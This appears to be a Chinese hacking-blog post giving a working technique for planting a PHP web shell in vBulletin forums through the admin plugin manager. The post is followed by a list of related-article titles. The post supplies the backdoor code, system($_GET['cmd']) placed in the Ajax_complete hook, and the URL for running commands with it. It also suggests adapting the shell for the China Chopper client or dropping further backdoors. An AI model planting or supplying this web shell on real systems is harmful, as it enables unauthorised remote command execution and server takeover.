vBulletin 论坛全版本 后台拿shell

简介:  在后台,进插件管理.添加插件.Ajax_complete 填入代码:1 if(isset($_GET['cmd'])){echo "cmd"; system($_GET['cmd']...
 

在后台,进插件管理.添加插件.

Ajax_complete 填入代码:1 if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}
1 if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}

激活mod

访问
www.site.com/forumlocation/ajax.php?cmd=command - 低调求发展& M1 O2 n- E$ Q2 X

比如
www.site.com/forumlocation/ajax.php?cmd=ls  就执行了ls的命令
 就是一个简单的get型一句话,也可以改成post型的,放入菜刀,或者写个put型的,生成一个小马


目录
相关文章
|
6月前
|
存储 Shell Linux
Linux编写一个极简版本的Shell
Linux编写一个极简版本的Shell
|
6月前
|
关系型数据库 Shell PHP
PHPCMS后台低权限拿SHELL
前提是需要有管理专题的权限 测试版本 PHPCMS程序版本:Phpcms V9.5.6 Release
|
2月前
|
Shell Linux C++
【Shell 编程设计】 编写自己的清理后台的Shell脚本
【Shell 编程设计】 编写自己的清理后台的Shell脚本
34 1
|
4月前
|
Shell 网络安全
在Shell中,后台进程管理
在Shell中,后台进程管理
40 4
|
6月前
|
Shell
shell脚本之判断当前内核主版本是否为3,且次版本是否大于10
shell脚本之判断当前内核主版本是否为3,且次版本是否大于10
40 0
|
10月前
|
存储 Java Shell
分布式数据库HBase的常用操作的基本Shell命令的状态/版本/Help命令
HBase是一个分布式数据库系统,支持高性能、可伸缩、实时的数据存储和处理。在HBase中,我们可以使用Shell命令来进行常用的操作,如创建表、插入数据、查询数据、更新数据等。本文将介绍关于分布式数据库HBase的常用操作基本Shell命令的状态/版本/Help命令。
353 0
|
Shell Linux Python
centos7系统 shell脚本安装python3 各版本
centos7系统 shell脚本安装python3 各版本
226 0
|
10月前
|
应用服务中间件 Shell nginx
Shell脚本:一键安装Nginx服务,用户可自定义Nginx版本
Shell脚本:一键安装Nginx服务,用户可自定义Nginx版本
256 0
|
分布式计算 监控 安全
【墨菲安全实验室】Spark(3.1.2, 3.2.1, 3.3.0版本)shell命令注入漏洞
【墨菲安全实验室】Spark(3.1.2, 3.2.1, 3.3.0版本)shell命令注入漏洞
【墨菲安全实验室】Spark(3.1.2, 3.2.1, 3.3.0版本)shell命令注入漏洞
|
NoSQL Shell MongoDB
MongoDB后台shell语句(二)
MongoDB后台shell语句(二)